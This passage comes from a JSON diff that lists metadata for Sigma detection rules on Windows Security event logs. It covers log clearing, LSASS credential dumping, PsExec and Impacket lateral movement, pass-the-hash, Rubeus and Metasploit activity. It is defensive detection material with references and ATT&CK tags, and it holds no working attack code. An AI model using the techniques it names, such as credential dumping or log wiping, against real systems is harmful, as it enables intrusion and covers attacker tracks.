Failing to Authenticate from Single Process" + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_security_susp_eventlog_cleared.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "value": "Security Eventlog Cleared" + }, + { + "description": "Detects the mount of ISO images on an endpoint", + "meta": { + "author": "Syed Hasan (@syedhasan009)", + "creation_date": "2021/05/29", + "falsepositive": [ + "Software installation ISO files" + ], + "filename": "win_security_iso_mount.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://twitter.com/MsftSecIntel/status/1257324139515269121", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "value": "ISO Image Mount" + }, + { + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "meta": { + "author": "Connor Martin, Nasreddine Bencherchali", + "creation_date": "2022/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_service_install_remote_access_software.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_install_remote_access_software.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "c8b00925-926c-47e3-beea-298fd563728e", + "value": "Remote Access Tool Services Have Been Installed - Security" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", + "value": "Invoke-Obfuscation Via Use MSHTA - Security" + }, + { + "description": "Detects process handle on LSASS process with certain access mask", + "meta": { + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + ], + "filename": "win_security_susp_lsass_dump_generic.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" + ], + "tags": [ + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" + ] + }, + "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "value": "Generic Password Dumper Activity on LSASS" + }, + { + "description": "Detects an installation of a device that is forbidden by the system policy", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_device_installation_blocked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" + ], + "tags": "No established tags" + }, + "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", + "value": "Device Installation Blocked" + }, + { + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_psexec.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "value": "Suspicious PsExec Execution" + }, + { + "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_admin_logon.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" + ], + "tags": "No established tags" + }, + "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", + "value": "User with Privileges Logon" + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source_ntlm2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "56d62ef8-3462-4890-9859-7b41e541f8d5", + "value": "Invalid Users Failing To Authenticate From Single Source Using NTLM" + }, + { + "description": "The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.", + "meta": { + "author": "Arun Chauhan", + "creation_date": "2021/10/04", + "falsepositive": [ + "Red team activity", + "Rare legitimate use by an administrator" + ], + "filename": "win_security_lolbas_execution_of_nltest.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/software/S0359/", + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482", + "attack.t1018", + "attack.t1016" + ] + }, + "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", + "value": "Correct Execution of Nltest.exe" + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "value": "Azure AD Health Monitoring Agent Registry Keys Access" + }, + { + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "meta": { + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "creation_date": "2017/08/22", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "filename": "win_security_wmi_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://twitter.com/mattifestation/status/899646620148539397", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "value": "WMI Persistence - Security" + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" + ], + "tags": "No established tags" + }, + "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", + "value": "Password Protected ZIP File Opened" + }, + { + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + ], + "filename": "win_security_gpo_scheduledtasks.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1106899890377052160", + "https://www.secureworks.com/blog/ransomware-as-a-distraction", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" + ] + }, + "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "value": "Persistence and Execution at Scale via GPO Scheduled Task" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "6309ffc4-8fa2-47cf-96b8-a2f72e58e538", + "value": "Failed NTLM Logins with Different Accounts from Single Source System" + }, + { + "description": "Alerts on Metasploit host's authentications on the domain.", + "meta": { + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2020/05/06", + "falsepositive": [ + "Linux hostnames composed of 16 characters." + ], + "filename": "win_security_metasploit_authentication.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", + "value": "Metasploit SMB Authentication" + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos3.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos3.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "bc93dfe6-8242-411e-a2dd-d16fa0cc8564", + "value": "Invalid Users Failing To Authenticate From Source Using Kerberos" + }, + { + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_security_diagtrack_eop_default_login_username.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "value": "DiagTrackEoP Default Login Username" + }, + { + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/31", + "falsepositive": [ + "Go utilities that use staaldraad awesome NTLM library" + ], + "filename": "win_security_alert_ruler.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", + "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", + "https://github.com/sensepost/ruler", + "https://github.com/sensepost/ruler/issues/47", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ] + }, + "uuid": "24549159-ac1b-479c-8175-d42aea947cae", + "value": "Hacktool Ruler" + }, + { + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "meta": { + "author": "Saw Winn Naung", + "creation_date": "2021/08/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_event_log_cleared.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_event_log_cleared.yml" + ], + "tags": [ + "attack.t1070.001" + ] + }, + "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", + "value": "Security Event Log Cleared" + }, + { + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "meta": { + "author": "Florian Roth, Daniil Yugoslavskiy, oscd.community (update)", + "creation_date": "2017/03/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mal_service_installs.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://awakesecurity.com/blog/threat-hunting-for-paexec/", + "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6", + "value": "Malicious Service Installations" + }, + { + "description": "Detects execution of Impacket's psexec.py.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/12/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_impacket_psexec.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", + "value": "Impacket PsExec Execution" + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "meta": { + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_apt_slingshot.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ] + }, + "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "value": "Defrag Deactivation - Security" + }, + { + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_svcctl_remote_service.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" + ] + }, + "uuid": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "value": "Remote Service Activity via SVCCTL Named Pipe" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "value": "Invoke-Obfuscation Via Use Rundll32 - Security" + }, + { + "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_user_logoff.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" + ], + "tags": "No established tags" + }, + "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", + "value": "User Logoff Event" + }, + { + "description": "Detects access to $ADMIN share", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/04", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_admin_share_access.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", + "value": "Access to ADMIN$ Share" + }, + { + "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.", + "meta": { + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2020/05/11", + "falsepositive": [ + "Exclude known DCs." + ], + "filename": "win_security_global_catalog_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_global_catalog_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "619b020f-0fd7-4f23-87db-3f51ef837a34", + "value": "Enumeration via the Global Catalog" + }, + { + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "meta": { + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "creation_date": "2019/06/14", + "falsepositive": [ + "Administrator activity" + ], + "filename": "win_security_pass_the_hash_2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", + "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", + "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1550.002" + ] + }, + "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "value": "Pass the Hash Activity 2" + }, + { + "description": "Detects renaming of file while deletion with SDelete tool.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/14", + "falsepositive": [ + "Legitimate usage of SDelete" + ], + "filename": "win_security_susp_sdelete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" + ] + }, + "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "value": "Secure Deletion with SDelete" + }, + { + "description": "Detects logon events that specify new credentials", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/06", + "falsepositive": [ + "Legitimate remote administration activity" + ], + "filename": "win_security_susp_logon_newcredentials.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml" + ], + "tags": "No established tags" + }, + "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", + "value": "Outgoing Logon with New Credentials" + }, + { + "description": "Detects certificate creation with template allowing risk permission subject", + "meta": { + "author": "Orlinum , BlueDefenZer", + "creation_date": "2021/11/17", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "value": "ADCS Certificate Template Configuration Vulnerability" + }, + { + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "meta": { + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_register_new_logon_process_by_rubeus.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ] + }, + "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", + "value": "Register new Logon Process by Rubeus" + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2019/12/20", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "filename": "win_security_apt_wocao.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "value": "Operation Wocao Activity - Security" + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "meta": { + "author": "OTR (Open Threat Research)", + "creation_date": "2018/11/28", + "falsepositive": [ + "Domain Controllers acting as printer servers too? :)" + ], + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "value": "DCERPC SMB Spoolss Named Pipe" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", + "value": "Invoke-Obfuscation Via Stdin - Security" + }, + { + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "meta": { + "author": "Bartlomiej Czyz, Relativity", + "creation_date": "2021/01/21", + "falsepositive": [ + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + ], + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bczyz1.github.io/2021/01/30/psexec.html", + 